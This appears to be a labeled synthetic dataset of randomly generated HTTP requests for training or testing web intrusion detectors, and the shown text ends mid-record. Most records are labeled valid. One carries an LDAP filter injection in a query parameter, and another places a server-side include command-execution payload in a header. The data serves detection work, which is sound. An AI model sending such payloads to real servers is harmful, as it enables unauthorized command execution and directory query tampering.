ETag: W/"snzYcROZfCdT0_HXP"
Expect: i6odg8a
From: atetgwlh@rphs.com
If-Modified-Since: Wed, 17 Nov 04 23:26:11 UTC
If-Unmodified-Since: Thu, 08 Apr 10 22:18:27 UTC
If-Match: "JqJ7.a5rHK9o0un.us0q"
If-None-Match: *
If-Range: *
Max-Forwards: 6798
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM eGVoYU44dHJtYXJUODcyZWV6b25idTRpN3RpMmMzcmlEYnY0MW5qcmFjQQ==
Authorization: Digest response="5dc4135A5DF33d19fFc37CdbA06B50E0"
Range: 618-573,4-,461-
Referer: /yIned/p8dyu8/endu/lrkAka/yazaor.jpg
TE: trailers
Trailer: TE
User-Agent: Mozilla/1.2 (Machintosh; U; PPC Mac OS X 1.2; Jt-et; rv:8.8.9) Gecko/72684063
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: HTTP/4.3 www.tsBitour.gif:1
Transfer-Encoding: identity
Upgrade: tati1/9.0, By2egw/7.7, naml/5.4, tau/2.1, 0aZt7/2.6
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39996
Start - Id: 11307
class: Valid
GET /ejdHm4c/3QandexecPb3o0htacces.msf?VEmH=8990969082&fnDr=ng&znraeht=biao%5CWni&e8seehenSto=ugrobyGebce3g&toGgDnt=6375&tlLwhasrnaN=15&Gnljnull5f1O60a=r3Yi1C&teo=119&_6YchildmX2mochaoug=vlmgroup+bynph-&E1etm=a%3Ema0oo HTTP/1.1
Host: www.a1ot.st
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1257, iso-8859-1, macintosh, koi8-r
Accept-Encoding: *
Accept-Language: iet-Egeva;q=0.4, amFecete-yfirn, 0jlau-ncnheT;q=0.5, clf-ada6a, uxbqhAh-sai3;q=0.2
Cache-Control: no-cache
Client-ip: 29.92.230.66
Cookie: qdh=rdEtxsnr
Cookie2: $Version="547"
Date: Thu, 17 Jul 08 13:54:21 GMT
ETag: W/"sZcIGDufhLwSbByvWi"
Expect: 7wietR
From: ehso1c@getooeoo6s.it
If-Modified-Since: Sat, 04 Jul 09 18:58:28 GMT
If-Unmodified-Since: Mon, 25 Aug 08 04:35:29 GMT
If-Match: "V0MOQZdegWHjPe8N133@"
If-None-Match: *
If-Range: Mon, 31 Dec 07 24:29:16 UTC
Max-Forwards: 1037
MIME-Version: 5.7
Pragma: 2s='95'
Proxy-Authorization: Basic MGt5bGk6d2h0c0N1aWI=
Authorization: NTLM eTk5NWkyb2RvOW9xbHRkaGNVNm1tbHRyYXBwY2hiaWhhVTJhbzA=
Range: -804989,80228-817083,634510-68597
Referer: /41saN.jsp
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/9.5 (Windows; U; WinNT 1.2; 3l-en; rv:6.2.8) Gecko/40030366
UA-CPU: Sparc
UA-Disp: 144,3420,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2840x080
Via: HTTP/8.4 www.edsnin.jpg, 7.8 www.t24rshas.shtml
Transfer-Encoding: identity
Upgrade: ts8em/4.4, tToe/0.3, tesFt/1.7
Warning: 175 www.nAlNiR.png "m3SZt1ats4" 
X-Forwarded-For: 203.140.233.72
X-Serial-Number: 7492268797432274
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11307
Start - Id: 21517
class: Valid
GET /rTF77GcEZlqnlzEK_0i0/6having2drop/eDBst2QgZJsgulH/enfs0defe9mAaI/f@HmS/UvfM8having/fhetn8s4trsi/zTP0V5eUR1-bF-/noeHbH84/zir.shtml? HTTP/1.1
Host: 101.12.63.151
Connection: dnafae
Accept: */*;q=0.4
Accept-Charset: iso-10646-ucs-2;q=0.4, windows-1255;q=0.6, iso-8859-3, windows-1251
Accept-Encoding: gzip;q=0.1
Accept-Language: rCowe-mesahilS, ptws-eeqmi;q=0.2, oeM-czri0;q=0.7, Edaeed-VetN, aUtns-c
Cache-Control: no-cache
Client-ip: 129.114.252.94
Cookie: tSIwagosqA=15258429;ggd8267saar=isamr3;hriAoueasrs=88;ok2MMselect4=52339;NaEmzejnsaxhg=mo9
Cookie2: $Version="57"
Date: Thu, 23 Sep 04 06:23:24 UTC
ETag: W/"iv@b4s9k5Xo4jt0E3"
Expect: bnur
From: suioa@wtliyr.cz
If-Modified-Since: Sat, 29 Jan 05 09:05:12 GMT
If-Unmodified-Since: Thu, 12 Aug 04 02:14:00 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: 0yw5ox eiep5=laseOb
Range: 538473-,02-79806
Referer: /aaqsdr/iunENJsa/o3mi/aalt/tmbc.php3
TE: trailers,gzip;q=0.7,trailers
Trailer: Referer
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 9.7; se-xm; rv:9.1.0) Gecko/96542802
UA-CPU: StrongARM
UA-Disp: 028,1328,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5415x3665
Via: Aspic/9.8 www.sierE.tiff:0668, 2.5 21.119.161.171, 0.9 189.54.197.52
Transfer-Encoding: identity
Upgrade: plddhm/2.0, afiewd/8.6, tst/4.7
Warning: 989 95.146.49.238 "goslds92assa6" "Thu, 02 Oct 08 01:14:20 UTC"
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21517
Start - Id: 25767
class: Valid
GET /xt/oROd@WY1tEJq89/j14inyMHfromZ.png?mqhglauSsex=snatPa4o&wdfe4AxGeuei6=194269&aaisMffogv=m5nog&nli=3Op0&eCdaksom=tcopyR%7Eo%26%27anha%3Fcy%5Cp&mm6rioehtnaE=33565&rixN=ilo6shsieH2e&eh5rnoeAmfs=eshlAcirrtraiogne&esen=zro9&ueeh=dRPcsiNuH3O%40 HTTP/1.0
Host: www.uhtmituw.uk:9103
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 193.210.122.211
Cookie: BnetcatXxNro5H=55688;.9rATtUobjectx8zG=3299
Cookie2: $Version="44"
Date: Fri, 23 Sep 05 05:33:37 UTC
ETag: W/"Tn3GOjM58@xlTf@7.kl7"
Expect: 100-continue
From: wsit@mwmse.com
If-Modified-Since: Thu, 30 Aug 07 23:06:12 CET
If-Unmodified-Since: Wed, 04 Jun 08 22:24:10 GMT
If-Match: *
If-None-Match: "lUSPS3LP75pmmU7"
If-Range: Fri, 13 Apr 07 21:01:03 CET
Max-Forwards: 5
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bWxvaGhtdEhmdDB3amhtZXdOc3lHbmpubmd0NGJjVDhhVHM3czRzbDAyWG0=
Authorization: Digest qop=auth
Range: 0846-,55-
Referer: http://ztecren.org/usaou/zmius.txt
TE: trailers,trailers,chunked;q=0.8
Trailer: Warning
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 0.6; nt-ee; rv:2.7.4) Gecko/23965661
UA-CPU: MIPS
UA-Disp: 4510,2608,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 291x574
Via: FTP/5.0 5.222.45.131, 2.5 33.109.79.12, 1.4 206.220.92.195
Transfer-Encoding: deflate
Upgrade: wqn/1.7, nvnp/4.1
Warning: 928 4.71.150.181 "eif2TenhunoLoU" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25767
Start - Id: 16342
class: Valid
GET /sd/uTJoesB/haozlaeA/aapdp5dJCeBnfL.aspx? HTTP/1.0
Host: www.feshtc.biz:26445
Connection: close
Accept: video/mpeg, text/xml
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: scmtn3-Kw;q=0.2
Cache-Control: no-store
Client-ip: 33.226.87.182
Cookie: erdacJ=absiesoodxoelc;tt5=yi0Fj8hQ;fsoqt0nnl=kgzha;oteAdw=39283495;arwnenaiiote=r
Cookie2: $Version="88"
Date: Mon, 21 Jun 04 06:03:09 UTC
ETag: W/"i_852kNFC8hsY6K2lVEr"
Expect: 100-continue
From: EMlse@n8Gtdetp8r.ch
If-Modified-Since: Tue, 23 Nov 04 24:21:58 UTC
If-Unmodified-Since: Wed, 07 Jul 04 09:04:42 CET
If-Match: *
If-None-Match: "rkyRuWRnyGrOu_igHqrH"
If-Range: *
Max-Forwards: 30
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM dGJlcjJlb1l3ZW9hc25zZHJlMHQ5ZW5pZkRuTGRsaWU=
Authorization: r7to v5wlD6=njheovto
Range: -652120,9-,091-
Referer: http://www.lgegmis.cz/lcoo/eadeto/Woeievmi/tDkspets/snto.avi
TE: deflate;q=0.5
Trailer: Upgrade
User-Agent: frnthsnsynRyet
UA-CPU: Sparc
UA-Disp: 101,468,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7557x889
Via: sfSuxm/7.1 www.nesnc.tiff, rsnwR5/1.0 216.60.213.85, 6.2 www.edIqln.shtml
Transfer-Encoding: naedet; atgeoeei=n6rt4Asi
Upgrade: ltsn/5.8, h5e/2.9, nabeo/7.5, tnn/0.6, pr74/9.1
Warning: 799 www.moaimt.jpg:7272 "O1enqniO8" "Mon, 09 May 05 14:13:25 CET"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 6166781
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16342
Start - Id: 23003
class: Valid
GET /gfPvwXStlVJ-uFaz/o4ehsf1a/lF/enuit3as0ottiq/rCGRwrk/er3DzS5ZyNFinKcia/locationHpW9K3vmsZ/rdaom/tW1gyiCloVWc4.html? HTTP/1.1
Host: 234.5.239.34
Connection: rAsgrt
Accept: */*;q=0.5
Accept-Charset: euc-cn, windows-874, x-mac-arabic
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 122.210.73.33
Cookie: z7pelneo=erzAYlvEBT7;nE=2ftpf;reee=sic\node;4B7umP2= tcH
Cookie2: $Version="26"
Date: Sun, 27 Jan 08 17:01:14 UTC
ETag: "wzZQbSe1fRpG8kbKV26z"
Expect: 100-continue
From: fnLmh@raE30feio.org
If-Modified-Since: Mon, 04 Jan 10 14:23:12 CET
If-Unmodified-Since: Sat, 11 Feb 06 05:13:27 GMT
If-Match: "mWnKPGxRkbeFRJ2_47_-"
If-None-Match: *
If-Range: "_4kKVJ-rT2RtIRq2J"
Max-Forwards: 1
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: fmr5 Ld67ld=n9o0r
Authorization: Omro07 arelmOi=Nuwnav
Range: 46141-509,21195-,-1
Referer: /aeselm/4Uei/tcaDlCg/dreLl/oertiah.php3
TE: trailers,chunked
Trailer: Range
User-Agent: Mozilla/8.3 (Windows; U; WinNT 4.8; rp-aE; rv:2.4.3) Gecko/45444509
UA-CPU: MIPS
UA-Disp: 4117,1833,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 465x0327
Via: 3xItr/8.0 177.160.69.52, 0.8 www.bryJ3eP.css:99743
Transfer-Encoding: identity
Upgrade: yhIHx/5.5
Warning: 344 200.127.208.91 "smpnteri811ahRiatlo" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 4642244930009310227
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23003
Start - Id: 25618
class: Valid
GET /tvylo5hiicqsar/Dbjeo4iuidl0Vv0nOnu/1azna0e/dbcrdNloeoowAm2p/tH/mnuTrrwinq/ris9pgA5id/6RIOnn/1u6hrqotlclst8/tTCvXLJMP.asmx?sH=cfnec+xh7gw2IhZ&60h69thwngw=access_logie4&mardmrOt=ekac+&toqEIblitsz=oAOY1tWWfPA&cys=img&tercOzoGts=3425213 HTTP/1.1
Host: www.UeeleEisn.com
Connection: rIro70
Accept: */*;q=0.1
Accept-Charset: iso-8859-1, x-mac-japanese;q=0.1, koi8-r;q=0.1
Accept-Encoding: compress;q=0.9, deflate, compress
Accept-Language: *;q=0.9
Cache-Control: max-stale=97
Client-ip: 86.20.85.20
Cookie: oo=185977496;icstd=pRTqG6uwe;vbscriptupdateI9uaPSnph-0=8157375183;xe8yjrl=ne/ys
Cookie2: $Version="92"
Date: Mon, 23 Jul 07 17:14:55 CET
ETag: "77kb4B5Tx-Kidlr"
Expect: o51lPsi=ojng4
From: 0hi6jdg@0eiMas.net
If-Modified-Since: Sat, 10 Apr 04 07:58:42 UTC
If-Unmodified-Since: Tue, 24 Jul 07 16:07:33 GMT
If-Match: *
If-None-Match: *
If-Range: "zTYKTPttHO@V0Pepk"
Max-Forwards: 2451
MIME-Version: 6.8
Pragma: iroooet=sluiri
Proxy-Authorization: NTLM dG95ZXM0ZW1TbDVPZXRpckV0eW1haUF3Y3hjc3N4Y2V0dGVjb2k=
Authorization: NTLM ZWVyZm5saWVoaW9qb2FpZWhTbnNwcHlaaGROcnJ0ZXFvbXRubkVsenRNcXNlcw==
Range: -1684
Referer: /atptoe8/sevrapm/nisosHny/nacdlyd/n1iptkpq.mdb
TE: gzip;q=0.5
Trailer: Max-Forwards
User-Agent: hHNliG http://www.re2ohtis.fr
UA-CPU: 68000
UA-Disp: 8439,526,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1157x6904
Via: oha5v/4.2 105.22.67.60, y4o3T/9.2 www.deol.jpeg
Transfer-Encoding: compress
Upgrade: adnta/2.9, tdea7/4.5, namtya/0.5, Oar/2.5, uhskt/9.4
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 400505966006
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25618
Start - Id: 22404
class: Valid
GET /nn/XWSQLRD1T0u_Ohttpsa.htm?ojagmhhqo=8ft+n&BcnmEfraEeteni=503&hrmsnstw=9184171&wonthir=2a%2F&9ets=45&alhkdyws=er+document&siNbutwto1otte=homerntanurfed&2o=rnloeiawpp6&rR5fYZobjecthtpass=eTSzZ60Le_&o1oAclsneoc=9520582&Xp3Slibicatbetweenm=8&aTmyeoeudgu=sa&yeesNAamdr9L=779 HTTP/1.1
Host: www.tt6iuco.fr
Connection: mEse1
Accept: application/*, application/*
Accept-Charset: x-mac-turkish;q=0.3, isiri-3342
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 195.143.59.185
Cookie: oearaen=12242;clohXr2oat=880254
Cookie2: $Version="025"
Date: Tue, 17 Mar 09 13:03:33 UTC
ETag: "YYFg_yu6KSP23m7mP"
Expect: 100-continue
From: osurT@isn3pers.uk
If-Modified-Since: Sun, 23 Sep 07 20:24:51 UTC
If-Unmodified-Since: Fri, 07 Jan 05 02:42:26 CET
If-Match: *
If-None-Match: "SlYxF6Yfz2yoVDw7"
If-Range: Tue, 05 Jul 05 06:44:44 CET
Max-Forwards: 3
MIME-Version: 0.8
Pragma: hs='tte'
Proxy-Authorization: rnic hovsi9ai=hhcDiun8
Authorization: Digest nonce
Range: -333
Referer: /en1me/oenstTna/es9pns8/efaRoO.pl
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/4.8 (X11; U; Linux i586 1.3; da-at; rv:2.6.6) Gecko/36194910
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: 0.2 www.fvTehxe.htm
Transfer-Encoding: gzip
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 245 169.86.241.14 "nhn9hhnhuaifml" "Sat, 17 Oct 09 10:05:26 CET"
X-Forwarded-For: 112.96.205.75
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22404
Start - Id: 5957
class: Valid
POST /nU20GBRiNB/o0Kx7PNJChYxQbp/rcsXo.Q/cCuXU72PWn.msf? HTTP/1.1
Content-Length: 71
Content-Language: nVlE4oeo
Content-Encoding: gzip
Content-Location: /eboh3/dEerj/lcjpi/isgos/ngNi.mdb
Content-MD5: ZWFldWloaHMzb2FuYmFhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 23 Sep 07 06:32:05 UTC
Last-Modified: Mon, 19 Jan 09 12:38:16 GMT
Host: www.nblteu.gov
Connection: close
Accept: audio/x-wav
Accept-Charset: x-mac-chinesetrad, utf-8;q=0.7, iso-2022-kr, x-mac-roman
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: max-age=8
Client-ip: 108.65.193.61
Cookie: oas8aOeMOeethpe=hTmPor4;jbYV=t/mocha;3XwZCUtXA87=8Cp;dbsrdo2=2;@HaN3=rSemi8yplrrnaiar;WwhtaNseUte=een-a
Cookie2: $Version="587"
Date: Thu, 11 Aug 05 13:37:14 UTC
ETag: W/"LZw_3rtc8.HiVzU-e"
Expect: illl=sigw
From: pe4asuz@ndPtobta.gov
If-Modified-Since: Mon, 27 Jun 05 14:55:22 GMT
If-Unmodified-Since: Mon, 30 Jun 08 20:09:43 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Jun 08 09:20:14 UTC
Max-Forwards: 064
MIME-Version: 2.6
Pragma: don4In='yisi0ee7'
Proxy-Authorization: Digest realm
Authorization: Digest uri=/iiwhfitd/an7ot.asp
Range: -20,452299-,40896-379
Referer: /iP2x4/a6atein/t2yY/d80angc.zip
TE: gzip,chunked
Trailer: Via
User-Agent: flgeipdeatdpa
UA-CPU: x86
UA-Disp: 461,413,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 457x9352
Via: HTTP/7.2 www.snen.html, HTTP/5.0 www.tstnJm.css, 6.4 www.dceogsp.css
Transfer-Encoding: deflate
Upgrade: treana/1.3, oher5/3.1
Warning: 151 www.2kIm.png "Nieie" 
X-Forwarded-For: 248.70.206.255
X-Serial-Number: 840738575772869612
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

RbetweenAn0.UxiframeX=509&es=0zleToieOrone&593o5N=89589&mohss=324496537

End - Id: 5957
Start - Id: 31540
class: Valid
GET /urhdytcSdl/K@@/r@0_SaEJcN/access_logEhomebetweenxx-.shtml?TMJe6h=ehtdf&eleurot2secp=%3Ctyine&9eerit01sIsg=aoeeNnn1f&ur9fktouz=zt&tnasa=6208&3n=8550&gs39g9Z=rcotE&nOidmreoqrt=3TtqferamIlrem&d4eelNetkelgEce=17438337&nCzbwgeta=e&uah4hamgfDn=ewo19rgTatnp&rsdu=nA&egahhcwetyd=34 HTTP/1.1
Host: 208.174.40.182:80
Connection: glwa
Accept: */*;q=0.0
Accept-Charset: koi8, iso-8859-1;q=0.6, macintosh, koi8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 84.244.242.42
Cookie: tRJghollinku=aWsO_t9j;etnmDeartna=8;ycdxarestBp=k f:;~;xf2Rldec=4693685
Cookie2: $Version="76"
Date: Sun, 26 Feb 06 06:26:24 GMT
ETag: "AhwrREaLU@Il.S2"
Expect: 100-continue
From: hlyrn9n@fimlaeyny.st
If-Modified-Since: Sat, 07 Apr 07 22:35:36 GMT
If-Unmodified-Since: Sun, 16 Jan 05 19:09:48 CET
If-Match: "grG7ADa7uXv0lBM3"
If-None-Match: "V4EP2oUXYDGXVTDr"
If-Range: "JIxieoPu0iG81ScuXulc"
Max-Forwards: 30
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM dE1laXRucXB0bjJ0ZGRybHlpYW9ubm50c3JobnVtZXpoZGhhZWU=
Authorization: Basic ZWVhVDpucnMw
Range: -2245
Referer: /tusOaeB.php4
TE: chunked
Trailer: Host
User-Agent: smrew6 (xI5DXb; rE7GEe; skunh4; h1B6hw_v)
UA-CPU: x86
UA-Disp: 5662,024,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 362x515
Via: aQi2/0.1 8.240.18.166, FTP/2.8 97.242.11.105, HTTP/5.0 170.32.215.35
Transfer-Encoding: cea5; etdirsi=t7xao
Upgrade: Csis5m/6.9, opoe/5.3, nade/2.1, dtOer/1.5, et7ss/5.5
Warning: 946 134.249.182.177:9568 "87neo" "Sat, 15 Jan 05 06:34:58 CET"
X-Forwarded-For: 231.71.249.70
X-Serial-Number: 5515370509152
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31540
Start - Id: 38119
class: LdapInjection
GET /hq0taEisEte/iemty3inuydrtthsn/upams.bin?4B=s9atdaoxlet&8shutdownoEKg=5fEaapri87u&t28dbodONePt=jsheiwsiYrut&topua=d&2z3el0navg0=tocinputSntr&lwTEeei=54050464&alAlL=15&heeoeszmO0tldm=ntt&re2=asnr4d7wmaso3psh&bcap3wtjwe=7&xenodt6=%2F+bhtpass9oaodeottrgn&dlrineWs=slocation-sohDorogwaNetie&80NsrrNsddtato=81684&GuwidWEihesmm=eh%29%28%26%28objectClass++++%3D++cDs*%29 HTTP/1.1
Host: www.8a40d.fr
Connection: close
Accept: text/*;q=0.9, text/*;q=0.1, application/x-tar;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Eilhd2ai-dCstne, xKit-sd;q=0.0, btrn-iwdss;q=0.2
Cache-Control: no-transform
Client-ip: 78.109.79.136
Cookie: htran9esDdfysg5=etin smtbetween;9Or6=yhejeae;eaetttt=&r]hftL;XPnodehwSwinntcJ=e1etmnAeblemocmuru
Cookie2: $Version="4"
Date: Wed, 09 Mar 05 13:15:28 CET
ETag: "JkoRqWUTwzQqckjWOFJx"
Expect: 100-continue
From: ithsetus@ennnrj.net
If-Modified-Since: Wed, 09 Sep 09 02:25:42 GMT
If-Unmodified-Since: Tue, 12 Sep 06 15:39:28 UTC
If-Match: "weUR-b2VXPYCQ1P3"
If-None-Match: *
If-Range: Tue, 21 Oct 08 13:10:14 GMT
Max-Forwards: 264
MIME-Version: 2.1
Pragma: rmScdhrl='tethlErh'
Proxy-Authorization: ttA2f lstyphu=yxiY
Authorization: mtik vc3Eion=aDdae
Range: 448259-
Referer: http://n28Ho.net/erh1/irca/sCoresoo.js
TE: chunked,chunked;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/3.9 (Machintosh; U; PPC 6.9; de-Ac; rv:9.8.9) Gecko/37158883
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3700x2595
Via: 2.6 14.227.29.154, HTTP/8.3 www.rewgqoot.js:117, 8.8 www.sseue.png
Transfer-Encoding: gzip
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 587 179.247.41.91:5 "gatfalPphg" "Thu, 07 Apr 05 01:06:21 UTC"
X-Forwarded-For: 194.35.95.99
X-Serial-Number: 7877748356062880
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38119
Start - Id: 25012
class: Valid
GET /Attco.aspx?i0r=cuY4Zfh7&tnrhsiAapdlhwlt=aeseh&d3fiutRmtxevir=x%27RhtaccesgOihOnepf&dt=norfv&fmre1eeol=xsTeamasdtTmim&lee=%3Adr&WaYm@body=Ees&V0-cfscriptstdin5F=d&ashq2=864587 HTTP/1.0
Host: 153.216.199.236
Connection: ht7xeac
Accept: application/rtf
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: a-yG;q=0.7
Cache-Control: max-age=1565
Client-ip: 99.69.163.62
Cookie: WsyAFFnW=169;onicewa5o=xnh=gh;Tisroomnat7A=9301539
Cookie2: $Version="2"
Date: Mon, 30 Nov 09 11:00:36 UTC
ETag: W/"0Hvg@u8X5QAlknvgh7rb"
Expect: ht9tkqtr
From: nzwrNfc3@izathr7huy.uk
If-Modified-Since: Sat, 06 Oct 07 10:17:04 UTC
If-Unmodified-Since: Tue, 06 Dec 05 02:24:48 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 06 May 05 20:18:38 GMT
Max-Forwards: 7985
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="lezief"
Authorization: Basic em10dGRMOml3bGllaHI=
Range: 46-,280-2255,32588-
Referer: /e5hschiU.htm
TE: trailers
Trailer: If-Match
User-Agent: 7fw0amhjuoeo9ogtamhe
UA-CPU: MIPS
UA-Disp: 0119,2506,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 669x906
Via: 2.9 www.atl6h1c.jpg
Transfer-Encoding: Aaitt
Upgrade: qrr/1.4, tcee/4.7, etrlFl/9.5, ehb/4.8
Warning: 705 www.ansn.gif "aoaht2" 
X-Forwarded-For: 190.232.63.32
X-Serial-Number: 92423943597
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25012
Start - Id: 39872
class: SSI
GET /aSUhPWSYvPtEOYsk8Xi/adAtdrhnhm/_zgroup by607Ti7.gif? HTTP/1.0
Host: 66.186.23.207
Connection: keep-alive
Accept: image/*, text/xml;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: <! #<!--   #exec   cmd="id"-->
Cache-Control: max-age=173
Date: Thu, 18 Sep 08 13:30:24 UTC
If-Unmodified-Since: Sat, 21 Apr 07 05:58:18 GMT
If-Match: *
If-Range: Sun, 20 Nov 05 23:03:51 GMT
Max-Forwards: 366
Referer: /bicZt/5iags6.jpeg
User-Agent: Mozilla/7.2 (X11; U; Open BSD i586 1.7; de-8f; rv:3.6.6) Gecko/78511332
Via: 2.6 www.bossio.png, HTTP/6.4 150.5.223.67
Upgrade: ehegr/0.3

null

End - Id: 39872
Start - Id: 17326
class: Valid
GET /3ws/hcaa/9ErotlThceti7/eOcsngse1anid/tqZo.RDQ0R6Z/lqQbyxhX.Ee2M9Ka7/XQinsert%u/chhnnane3/8kldtHmm9htp.mspx?miidreyetttrsu=4%5C&tunnin3=engryaa&TcmdphpjLqAvRExE=a0q3&c4t=xat3rMl6hw&uu9t7tlerta=89611887&tosemt=3693933411&qcQacceptjdocumenthavingDVu=0XmUOz.5%40PJ2&BF_sMTexec0=11173420&scinLihrw=oO5m3aD&LiW6Q3g=nHqZcF&ad3S=ac4sa&m.5R7=764289551&y6pcatdcatEs-RS=34363&z.Yqf=%28positionlix HTTP/1.0
Host: www.Rsaihao.fr
Connection: keep-alive
Accept: text/html;q=0.3, video/mpeg;q=0.4
Accept-Charset: hz-gb-2312;q=0.5, x-mac-japanese
Accept-Encoding: deflate, gzip, identity;q=0.6
Accept-Language: t-mo;q=0.9, srntead-a, ongmm-eo2L8bA, rrmn-eyvssnp
Cache-Control: no-store
Client-ip: 251.211.186.188
Cookie: g7Eer0rdaedS=thogHuOls;atu8=s72;rbDsn=8gexNyxs5r;9@Nl=eR2tc/xa<
Cookie2: $Version="3"
Date: Wed, 31 May 06 18:36:12 CET
ETag: "QVMqCuT5TpXXe2D"
Expect: 100-continue
From: Ziuts@vomg5.it
If-Modified-Since: Fri, 30 Jun 06 01:07:14 UTC
If-Unmodified-Since: Tue, 16 Oct 07 24:42:10 UTC
If-Match: *
If-None-Match: "JhVZ@tv.XdXvrzLTy"
If-Range: *
Max-Forwards: 717
MIME-Version: 0.0
Pragma: he=fn7ox
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: NTLM ZXJpNmVwNzFubGh1b3VmaXdUcm4yZWk0emhlMmlidHJlb2V6
Range: 570800-
Referer: /dqo647Fx/apnetd.mpg
TE: trailers
Trailer: Range
User-Agent: ot2dti9thsihrcSoh
UA-CPU: 68000
UA-Disp: 8556,725,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 455x7663
Via: iug6p0/0.8 254.76.235.226, 5.5 www.Mhitie.html:8, 3.9 255.22.200.58
Transfer-Encoding: gzip
Upgrade: siw/5.1, pnee/6.8, tnnE/9.7, osHvsm/3.4
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 75371955994853740
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17326
Start - Id: 3184
class: Valid
GET /etoas/JqRrpgYxterm9WorH/drgbaspgia/htpasszXbfQpassthru0D/qBQzfD19i/oxvO/nUZWHEvDpC/gsgjxurhO.exe?naerslahIear1ha=m&aah=deonEnfotnGotte&p.t5hr0Q5@OO=9330&lVJFTcmdZutjJ=tUhHpAM%405u&YYtNandS=wEocnC&ma=4612413&es6fcU=e5L2m0PuK&ipnte=5WsxiyVErJN&ifs=1656&HidmailvL6K1OidIs=5550&Ed-3jEVq@Pd=2 HTTP/1.0
Host: www.ltI6fr59xe.com
Connection: close
Accept: application/x-tar, text/xml;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=27404
Client-ip: 155.254.73.248
